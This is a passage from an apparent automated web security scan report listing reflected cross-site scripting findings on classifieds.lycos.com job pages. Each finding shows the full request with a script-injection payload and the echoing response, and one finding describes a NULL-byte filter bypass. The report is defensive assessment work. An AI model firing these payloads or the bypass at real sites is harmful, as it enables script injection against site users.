Path:   /job-advertising/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fde33"><script>alert(1)</script>b78103d674b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-advertising/?fde33"><script>alert(1)</script>b78103d674b=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:10:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:10:42 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-advertising/?fde33"><script>alert(1)</script>b78103d674b=1&mobile=1" rel="nofollow">
...[SNIP]...

1.72. http://classifieds.lycos.com/job-customer_service/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-customer_service/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4e44"><script>alert(1)</script>48af843abc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-customer_serviceb4e44"><script>alert(1)</script>48af843abc/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:12:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-customer_serviceb4e44"><script>alert(1)</script>48af843abc/?mobile=1" rel="nofollow">
...[SNIP]...

1.73. http://classifieds.lycos.com/job-customer_service/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-customer_service/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8344e"><script>alert(1)</script>c46db3618e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-customer_service/?8344e"><script>alert(1)</script>c46db3618e6=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:40 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-customer_service/?8344e"><script>alert(1)</script>c46db3618e6=1&mobile=1" rel="nofollow">
...[SNIP]...

1.74. http://classifieds.lycos.com/job-finance/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-finance/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a155a"><script>alert(1)</script>d3bf9ba5c9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-financea155a"><script>alert(1)</script>d3bf9ba5c9c/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:47 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-financea155a"><script>alert(1)</script>d3bf9ba5c9c/?mobile=1" rel="nofollow">
...[SNIP]...

1.75. http://classifieds.lycos.com/job-finance/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-finance/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddf33"><script>alert(1)</script>ba87cf83b94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-finance/?ddf33"><script>alert(1)</script>ba87cf83b94=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:10:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:10:52 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-finance/?ddf33"><script>alert(1)</script>ba87cf83b94=1&mobile=1" rel="nofollow">
...[SNIP]...

1.76. http://classifieds.lycos.com/job-nonprofit/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-nonprofit/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bc6e"><script>alert(1)</script>b4026032be9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-nonprofit8bc6e"><script>alert(1)</script>b4026032be9/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:12:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:20 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-nonprofit8bc6e"><script>alert(1)</script>b4026032be9/?mobile=1" rel="nofollow">
...[SNIP]...

1.77. http://classifieds.lycos.com/job-nonprofit/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-nonprofit/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9fb2"><script>alert(1)</script>0ee80b17dde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-nonprofit/?a9fb2"><script>alert(1)</script>0ee80b17dde=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:53 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-nonprofit/?a9fb2"><script>alert(1)</script>0ee80b17dde=1&mobile=1" rel="nofollow">
...[SNIP]...

1.78. http://classifieds.lycos.com/job-retail/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-retail/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009cbe7"><script>alert(1)</script>db333101482 was submitted in the REST URL parameter 1. This input was echoed as 9cbe7"><script>alert(1)</script>db333101482 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /job-retail%009cbe7"><script>alert(1)</script>db333101482/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:12:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:28 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-retail%009cbe7"><script>alert(1)</script>db333101482/?mobile=1" rel="nofollow">
...[SNIP]...

1.79. http://classifieds.lycos.com/job-retail/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-retail/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f5b3"><script>alert(1)</script>ea30b774ac5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-retail5f5b3"><script>alert(1)</script>ea30b774ac5/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:49:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:49:59 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-retail5f5b3"><script>alert(1)</script>ea30b774ac5/?mobile=1" rel="nofollow">
...[SNIP]...

1.80. http://classifieds.lycos.com/job-retail/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-retail/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eed2"><script>alert(1)</script>2905db3b6fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-retail/?4eed2"><script>alert(1)</script>2905db3b6fd=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:56 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-retail/?4eed2"><script>alert(1)</script>2905db3b6fd=1&mobile=1" rel="nofollow">
...[SNIP]...

1.81. http://classifieds.lycos.com/job-sales/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-sales/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96fa6"><script>alert(1)</script>def49ff2313 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-sales96fa6"><script>alert(1)</script>def49ff2313/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:11:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:58 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-sales96fa6"><script>alert(1)</script>def49ff2313/?mobile=1" rel="nofollow">
...[SNIP]...

1.82. http://classifieds.lycos.com/job-sales/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-sales/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17c70"><script>alert(1)</script>3428ab5ad3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-sales/?17c70"><script>alert(1)</script>3428ab5ad3b=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-sales/?17c70"><script>alert(1)</script>3428ab5ad3b=1&mobile=1" rel="nofollow">
...[SNIP]...

1.83. http://classifieds.lycos.com/job-tech/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-tech/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5865d"><script>alert(1)</script>782edef86df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-tech5865d"><script>alert(1)</script>782edef86df/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:12:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-tech5865d"><script>alert(1)</script>782edef86df/?mobile=1" rel="nofollow">
...[SNIP]...

1.84. http://classifieds.lycos.com/job-tech/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-tech/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80f9c"><script>alert(1)</script>4fb2b134996 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-tech/?80f9c"><script>alert(1)</script>4fb2b134996=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:11:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 52469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-tech/?80f9c"><script>alert(1)</script>4fb2b134996=1&mobile=1" rel="nofollow">
...[SNIP]...

1.85. http://classifieds.lycos.com/job-work_from_home/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-work_from_home/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80a84"><script>alert(1)</script>b01d18e6368 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-work_from_home80a84"><script>alert(1)</script>b01d18e6368/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:51 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-work_from_home80a84"><script>alert(1)</script>b01d18e6368/?mobile=1" rel="nofollow">
...[SNIP]...

1.86. http://classifieds.lycos.com/job-work_from_home/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job-work_from_home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57054"><script>alert(1)</script>094863826eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job-work_from_home/?57054"><script>alert(1)</script>094863826eb=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
